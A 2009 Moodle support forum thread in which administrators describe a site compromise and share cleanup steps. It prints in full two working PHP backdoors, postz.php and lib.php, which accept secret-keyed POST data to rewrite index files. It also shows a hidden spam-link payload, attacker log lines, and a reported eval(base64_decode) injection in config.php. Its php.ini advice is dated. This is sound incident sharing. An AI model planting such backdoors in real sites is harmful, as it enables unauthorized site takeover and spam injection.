Reading carefully the log I have discovered that someone has uploaded files into my moodle dir. I dont know yet how he did as I have no log from the time the files were created. Here is a description of the three files that I found.
The 23 of July, someone (probably 69.65.40.176) uploaded postz.php. It contained this code:
<?php
if (!function_exists('file_get_contents')) {
function file_get_contents($filename, $incpath = false, $resource_context = null) {
if (false === $fh = fopen($filename, 'r', $incpath)) {
return false;
}
clearstatcache();
if ($fsize = @filesize($filename)) {
$data = fread($fh, $fsize);
} else {
$data = '';
while (!feof($fh)) {
$data .= fread($fh, 8192);
}
}
fclose($fh);
return $data;
}
}
$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
$files_to_post = array(
'index.php',
'../index.php',
'../../index.php',
'../../../index.php'
);
$error = 0;
if (isset($_POST['data']) && isset($_POST['secret'])) {
if (md5($secret_key) == $_POST['secret']) {
$post_data = stripslashes($_POST['data']);
foreach ($files_to_post as $file_to_post) {
//read file
if (!file_exists($file_to_post) || !is_writable($file_to_post)) {
$error++;
continue;
}
$old_file = file_get_contents($file_to_post);
//insert links
if (preg_match('#<!-- moodle -->.+<!-- moodle -->#s', $old_file)) {
$old_file = preg_replace('#<!-- moodle -->.+<!-- moodle -->#s', "<!-- moodle -->\n".$post_data."\n<!-- moodle -->", $old_file);
} else {
$old_file = preg_replace('|print_footer\(["\']home["\']\);|i', "?>\n<!-- moodle -->\n".$post_data."\n<!-- moodle -->\n<?php\nprint_footer('home');", $old_file);
}
//replace old file
$hFile = fopen($file_to_post, 'w');
if (!$hFile) {
$error++;
fclose($hFile);
continue;
}
if (FALSE !== fwrite($hFile, $old_file)) {
fclose($hFile);
} else {
$error++;
fclose($hFile);
}
}
if ($error === 4) {
echo '### Error 404 ###';
} else {
echo 'OK';
}
} else {
echo "### Error 404 ###";
}
} else {
echo "### Error 404 ###";
}
?>
You can read from the code that it opens /moodle/index.php and add contents to it. 69.65.40.176 has runned this several times these days. This was the last log text:
69.65.40.176 [22/Sep/2009:05:09:20 -0400] "POST /moodle/postz.php HTTP/1.1" 200 14 "-" "-"
Now that I discovered this file I changed the name of the file, in case of documentation needs.
The log today told me also this:
69.65.40.176 [22/Sep/2009:05:46:43 -0400] "POST /moodle/gif/lib.php
The /moodle/gif dir was created 08/13/09 and it contained two files: lib.php and inc.php
This is the content of lib.php:
<?php
$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
$file_to_post = 'inc.php';
if (isset($_POST['data']) && isset($_POST['secret'])) {
if (md5($secret_key) == $_POST['secret']) {
$hFile = fopen($file_to_post, 'w');
if (!$hFile) {
die('error opening file');
}
if (FALSE !== fwrite($hFile, stripslashes($_POST['data']))) {
echo 'OK';
fclose($hFile);
} else {
echo '### 404 ###';
}
} else {
echo "### 404 ###";
}
} else {
echo "### 404 ###";
}
?>
The inc.php contained this code:
<u style="display:none;"><a href="http://mackenzie.ce.washington.edu/CFVST/?p=buy-viagra.php">buy cheap uk viagra</a>dd614d5<a href="http://mackenzie.ce.washington.edu/CFVST/?p=buy-viagra.php">next dat delivery generic viagra</a>e0f7ec3</u>
Well, I hope that by changing my pw and changing the names of these files I get some peace.
I still wonder who this 69.65.40.176 is and how he/she succeeded to upload the files.
Any idea?
THE IP address goes to:
I got a hack like yours last night.
Timothy Kane
http://trainig.nvabc.com
| 69.65.40.176 - Geo Information | |
| IP Address | 69.65.40.176 |
| Host | chi.hd-gaming.com |
| Location |  US, United States
|
| City | Arlington Heights, IL 60005 |
| Organization | GigeNET |
| ISP | GigeNET |
I got a hack like yours last night.
Timothy Kane
http://trainig.nvabc.com
Check the config.php file!
I found in the first line "eval(base64_decode(" with a hugh number after it.
It should not be there, It should look something like this.
<?PHP // $Id: config-dist.php,v 1.98 2006/11/11 17:23:33 skodak Exp $
///////////////////////////////////////////////////////////////////////////
See the Moodle info on base64_decode
Tim
I found in the first line "eval(base64_decode(" with a hugh number after it.
It should not be there, It should look something like this.
<?PHP // $Id: config-dist.php,v 1.98 2006/11/11 17:23:33 skodak Exp $
///////////////////////////////////////////////////////////////////////////
See the Moodle info on base64_decode
Tim
Folks just can't leave well enough alone, can they? :\ Sigh.
Found the postz.php file in a 1.8.x version installed on a server. Like you, I've re-named AND moved out of web root into another directory for inspection, etc..
Now I don't know if this is considered proper, but grow tried of being "network nice" so, re-created the postz.php file only it's no longer writable by anyone and put a 0 seconds wait auto forward back to the offending IP address identified. Not trying to start any network war but figured if it's trying to phone home, I'll help it find "home" pronto!
Yours, in the "spirit of sharing",
Ken
Found the postz.php file in a 1.8.x version installed on a server. Like you, I've re-named AND moved out of web root into another directory for inspection, etc..
Now I don't know if this is considered proper, but grow tried of being "network nice" so, re-created the postz.php file only it's no longer writable by anyone and put a 0 seconds wait auto forward back to the offending IP address identified. Not trying to start any network war but figured if it's trying to phone home, I'll help it find "home" pronto!
Yours, in the "spirit of sharing",
Ken
Check your theme header.php file.
This lead me to a host of other things I found.
I found a piece of code there that refered to an old moodle site I had. It loaded code from the SSO folder and a file called tag.php., which didn't belong there. That is where I found all the html links code.
I have left the php files but have change the code in them to make them harmless.
Hopefully if they try another attacked it will take a lot more work.
I changed the config file to 644. I am trying yo find out if I can change it to 400.
I found some of my .htaccess files were backed up to .htaccess_bk and then a new .htaccess was installed to make all the directories readable.
I have placed a index.html file in the directories so if it happens again the index.html will come up not the directory listing. The index.html redirects to the main page.
I changed my FTP, MySql and Moodle Admin passwords.
I put in a php.ini in the main directory
register_globals = 0 ;(necessary)
safe_mode = 0 ;(necessary)
memory_limit = 40M ;(varies: minimum 16M, 32M Moodle v1.7, 40M Moodle v1.8, 128M large sites)
session.save_handler = files ;(unless you are using another handler, e.g. mm)
magic_quotes_gpc = 1 ;(preferred but not necessary, 0 will be highly recommended in 2.0)
magic_quotes_runtime = 0 ;(necessary)
file_uploads = 1
session.auto_start = 0 ;(necessary)
session.bug_compat_warn = 0
post_max_size = 2M
upload_max_filesize = 2M
I download my site to my harddrive. I then download a 30 trail of Kaspersky Anti-Virus.
It found out the attacked was done with a php Trojan Horse.
This may not stop anybody, but hopefully it will slow them down and they will look for an easier target.
Tim
This lead me to a host of other things I found.
I found a piece of code there that refered to an old moodle site I had. It loaded code from the SSO folder and a file called tag.php., which didn't belong there. That is where I found all the html links code.
I have left the php files but have change the code in them to make them harmless.
Hopefully if they try another attacked it will take a lot more work.
I changed the config file to 644. I am trying yo find out if I can change it to 400.
I found some of my .htaccess files were backed up to .htaccess_bk and then a new .htaccess was installed to make all the directories readable.
I have placed a index.html file in the directories so if it happens again the index.html will come up not the directory listing. The index.html redirects to the main page.
I changed my FTP, MySql and Moodle Admin passwords.
I put in a php.ini in the main directory
register_globals = 0 ;(necessary)
safe_mode = 0 ;(necessary)
memory_limit = 40M ;(varies: minimum 16M, 32M Moodle v1.7, 40M Moodle v1.8, 128M large sites)
session.save_handler = files ;(unless you are using another handler, e.g. mm)
magic_quotes_gpc = 1 ;(preferred but not necessary, 0 will be highly recommended in 2.0)
magic_quotes_runtime = 0 ;(necessary)
file_uploads = 1
session.auto_start = 0 ;(necessary)
session.bug_compat_warn = 0
post_max_size = 2M
upload_max_filesize = 2M
I download my site to my harddrive. I then download a 30 trail of Kaspersky Anti-Virus.
It found out the attacked was done with a php Trojan Horse.
This may not stop anybody, but hopefully it will slow them down and they will look for an easier target.
Tim
Hello,
Could you tell me which software version you’re using for:
PHP?
Moodle?
Have you used all of the best safety practices informed at moodle.org ?
I am using a version of php5.
I update to latest version of moodle.
My hosting provider changed of their internal setting to my site to made an attack much harder.
Tim
I update to latest version of moodle.
My hosting provider changed of their internal setting to my site to made an attack much harder.
Tim